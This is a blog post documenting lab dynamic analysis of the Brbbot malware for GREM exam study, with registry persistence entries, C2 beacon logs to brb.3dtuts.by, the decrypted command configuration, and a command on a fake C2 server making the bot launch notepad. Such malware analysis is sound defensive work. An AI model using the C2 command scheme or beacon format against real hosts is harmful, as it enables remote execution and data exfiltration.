This post and all others for this month are part of the series which I used to help me prepare for my GIAC Reverse Engineer Malware (GREM) certification.
In the previous post, we did static analysis of Brbbot. In this post, we look at dynamic analysis, to gain insights into the behaviour of the program. Remember, VirusTotal reported that 52/74 engines reported this file as malicious.
The tools use here will be as follows:
- TShark
- InetSim on Kali
- Process Monitor - Windows 10
- Process Hacker - Windows 10
- Process Explorer - Windows 10
- RegShot - Windows 10
- ProcDot
Let's see what the tools above provided us once we executed brbbot.exe on Windows 10 as an administrator.
Looking first at the RegShot comparison summary, we see:
Note the total changes are not all from running brbbot.exe but also from other programs which were executed intentionally or unintentionally.
Looking at the report and picking out a few entries of immediate interest.
Created with Regshot 1.9.1 x64 Unicode (beta r321) Comments: Datetime: 2020-11-08 20:19:04, 2020-11-08 22:15:15 Computer: SECURITYNIK-WIN, SECURITYNIK-WIN Username: SecurityNik, SecurityNik Values added: ... HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe" HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe" HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\brbbot.exe: 53 41 43 50 01 00 00 00 00 00 00 00 07 00 00 00 28 00 00 00 00 28 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0A 73 20 00 00 DB 80 FD AC 28 39 D3 01 00 00 00 00 00 00 00 00 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe" HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe" ...
Taking a quick look via Process Hacker.
Looking at the general tab
Peaking into the Strings loaded into memory.
Peaking into the modules being used brbbot.exe.
Transitioning to ProcDot, where a save copy of the Process Monitor events are fed to it as input file.
$ sudo cat /var/log/inetsim/report/report.18951.txt | more === Report for session '18951' === Real start date : 2020-11-08 17:11:53 Simulated start date : 2020-11-08 17:11:53 Time difference on startup : none ... 2020-11-08 17:12:52 DNS connection, type: A, class: IN, requested name: brb.3dtuts.by 2020-11-08 17:12:52 HTTP connection, method: GET, URL: http://brb.3dtuts.by/ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e6008222 82f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e 233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e6 03f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60 282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e2 33e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d38333428 2f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e3 5283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e 29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232 b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e35 2f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1 f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934 383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b2934383634357 53e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e60 0822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e, f ile name: /var/lib/inetsim/http/fakefiles/sample.html ...
└─$ tshark -r brbbot.pcap -Y "dns.qry.name == brb.3dtuts.by" 15 25.543214256 10.0.0.110 → 10.0.0.114 DNS 73 Standard query 0x6a64 A brb.3dtuts.by 16 25.551623068 10.0.0.114 → 10.0.0.110 DNS 89 Standard query response 0x6a64 A brb.3dtuts.by A 10.0.0.114
└─$ tshark -r brbbot.pcap -Y "http.host == brb.3dtuts.by" -T fields -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.host -E header=y frame.time ip.src tcp.srcport ip.dst tcp.dstport http.host Nov 8, 2020 17:12:52.715732789 EST 10.0.0.110 4081 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:13:22.745066520 EST 10.0.0.110 4082 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:13:52.763137491 EST 10.0.0.110 4084 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:14:22.782289408 EST 10.0.0.110 4086 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:14:52.826690345 EST 10.0.0.110 4087 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:15:22.865526674 EST 10.0.0.110 4088 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:15:52.908439391 EST 10.0.0.110 4089 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:16:22.928449020 EST 10.0.0.110 4090 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:16:52.954382147 EST 10.0.0.110 4092 10.0.0.114 80 brb.3dtuts.by
└─$ tshark -r brbbot.pcap -q -z follow,tcp,ascii,10.0.0.110:4081,10.0.0.114:80 130 ⨯ =================================================================== Follow: tcp,ascii Filter: ((ip.src eq 10.0.0.110 and tcp.srcport eq 4081) and (ip.dst eq 10.0.0.114 and tcp.dstport eq 80)) or ((ip.src eq 10.0.0.114 and tcp.srcport eq 80) and (ip.dst eq 10.0.0.110 and tcp.dstport eq 4081)) Node 0: 10.0.0.110:4081 Node 1: 10.0.0.114:80 2148 GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e35283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e352f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b293438363435753e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e600822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) Host: brb.3dtuts.by Connection: Close Cache-Control: no-cache 150 HTTP/1.1 200 OK Connection: Close Content-Type: text/html Date: Sun, 08 Nov 2020 22:12:52 GMT Content-Length: 258 Server: INetSim HTTP Server 258 <html> <head> <title>INetSim default HTML page</title> </head> <body> <p></p> <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p> <p align="center">This file is an HTML document.</p> </body> </html>
└─$ sudo cat /var/www/html/ads.php <HTML> <TITLE>SecurityNik ads.php</TITLE> <BODY> Welcome to SecurityNik World! </BODY> </HTML>
10.0.0.110 - - [08/Nov/2020:22:24:05 -0500] "GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e35283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e352f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e602b2934383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b293438363435753e233e600b2934383634356d6f753e233e60282d383334282f753e233e600c32293e28333a2930753e233e600822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603d32293e3d3423753e233e60282d383334282f753e233e603a2e3f32343f3c753e233e6039293939342f753e233e HTTP/1.1" 200 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
C:\Tools\SysinternalsSuite>handle64.exe -p brbbot.exe Nthandle v4.11 - Handle viewer Copyright (C) 1997-2017 Mark Russinovich Sysinternals - www.sysinternals.com ------------------------------------------------------------------------------ brbbot.exe pid: 4164 SECURITYNIK-WIN\SecurityNik 108: File (R--) C:\GREM-Malware\Malware\day1\brbconfig.tmp
Scrolling through until I fond the CryptDecrypt function, I then set a breakpoint at the instruction directly after. This then allowed me to see the decrypted content of the brbconfig.tmp file as shown below.
"uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000"
─$ sudo bash -c 'echo -e cexe notepad.exe > /var/www/html/ads.php' ─$ sudo cat /var/www/html/ads.php cexe notepad.exe
PS C:\Users\SecurityNik> Get-Process *notepad* | Select-Object -Property Name,Id,StartTime,ProcessName | Sort-Object -Property StartTime Name Id StartTime ProcessName ---- -- --------- ----------- notepad 5444 11/9/2020 11:38:58 PM notepad notepad 3528 11/9/2020 11:39:29 PM notepad notepad 3856 11/9/2020 11:39:59 PM notepad notepad 7740 11/9/2020 11:40:29 PM notepad notepad 5376 11/9/2020 11:40:59 PM notepad notepad 6984 11/9/2020 11:41:29 PM notepad notepad 7252 11/9/2020 11:41:59 PM notepad notepad 7748 11/9/2020 11:42:29 PM notepad notepad 7176 11/9/2020 11:42:59 PM notepad notepad 2964 11/9/2020 11:43:29 PM notepad notepad 3640 11/9/2020 11:43:59 PM notepad notepad 2280 11/9/2020 11:44:29 PM notepad notepad 5448 11/9/2020 11:44:59 PM notepad notepad 8184 11/9/2020 11:45:29 PM notepad notepad 2112 11/9/2020 11:45:59 PM notepad notepad 2428 11/9/2020 11:46:29 PM notepad notepad 3368 11/9/2020 11:46:59 PM notepad notepad 5036 11/9/2020 11:47:29 PM notepad notepad 3632 11/9/2020 11:47:59 PM notepad notepad 2608 11/9/2020 11:48:29 PM notepad notepad 6372 11/9/2020 11:48:59 PM notepad notepad 7524 11/9/2020 11:49:29 PM notepad notepad 6780 11/9/2020 11:49:59 PM notepad notepad 248 11/9/2020 11:50:29 PM notepad notepad 7616 11/9/2020 11:50:59 PM notepad notepad 192 11/9/2020 11:51:29 PM notepad
PS C:\Users\SecurityNik> wmic process where "name like '%notepad%'" get name,processID,ParentProcessID Name ParentProcessId ProcessId notepad.exe 1596 5444 notepad.exe 1596 3528 notepad.exe 1596 3856 notepad.exe 1596 7740 notepad.exe 1596 5376 notepad.exe 1596 6984 notepad.exe 1596 7252 notepad.exe 1596 7748 notepad.exe 1596 7176 notepad.exe 1596 2964 notepad.exe 1596 3640 notepad.exe 1596 2280 notepad.exe 1596 5448 notepad.exe 1596 8184 notepad.exe 1596 2112 notepad.exe 1596 2428 notepad.exe 1596 3368 notepad.exe 1596 5036 notepad.exe 1596 3632 notepad.exe 1596 2608 notepad.exe 1596 6372 notepad.exe 1596 7524 notepad.exe 1596 6780 notepad.exe 1596 248 notepad.exe 1596 7616 notepad.exe 1596 192 notepad.exe 1596 672
PS C:\Users\SecurityNik> wmic process where processid="1596" get name,processID,parentProcessID Name ParentProcessId ProcessId brbbot.exe 4476 1596
Final step now is to decode the traffic from the HTTP request within the p parameter above. We saw in the ads.php file a value of encode=5b. This 5b is used to Hex encode the values within the p parameter. I copied the values in the p parameter to a file named p-parameter.txt with everything on one line. Here is what that looks like.
└─$ cat p-parameter.txt 123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e35283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e352f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b293438363435753e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e600822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e
└─$ xxd -revert -plain p-parameter.txt > p-parameter.raw
└─$ cat p-parameter.raw ?7>"(/>6`(6((u>#>`8()((u>#>`,25252/u>#>`8()((u>#>`,2574<45u>#>`(>)-28>(u>#>`7(:((u>#>`(-834(/u>#>`=45/?)-34(/u>#>`=45/?4>)-28>u>#>`>64)"{▒46+)>((245`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(+447(-u>#>`(-834(/u>#>"(645u>#>`(+7.50?u>#>>8.)2/">:7/>)-28>u>#>`(-834(/u>#>`.5(>8:++u>#>`84534(/u>#>`(+7.50v,25>-/74<u>#>`(-834(/u>#>>:)835?>#>)u>#>`(-834(/u>#>`(234(/u>#>`(-834(/u>#>`/:(034(/,u>#>`8/=645u>#>`>#+74)>)u>#>3>77#+>)2>58>4(/u>#>>:)83u>#>` .5/26>)4#):"u>#>`5>)2->u>#>`>7+0>)u>#>0"+>:80<)4.5?4(/u>#>▒.2u>#>` :5>u>#>`▒++728:/245):6>4(/u>#>` )48>((:80>)u>#>`+)48>#+mou>#>` .5/26>)40>)u>#>`?7734(/u>#>`86?u>#>`84534(/u>#>` )48645u>#>` )48645mou>#>` ><(34/v#mov5284?>u>#>`(-834(/u>#>` 2)>(3:)0u>#>"(/>>//25<(u>#>`/:(034(/,u>#>`?7734(/u>#>`?7734(/u>#>`9)994/u>#>
After decoding, we see that along with the IP address and computer name, brbbot.exe also was exfiltrating information on the processes currently running on the host.
http://jon.glass/blog/Hacking-BRBbot/
https://www.aldeid.com/wiki/72922cab21d75a9e2da351bda35bdd9f
Microsoft - 64 Calling Conventions
Cool Byte - x64 Calling Conventions
CreateFileA Function
ReadFile Function
CyberChef
SANS FOR610 - Reverse Engineering Malware - GREM
No comments:
Post a Comment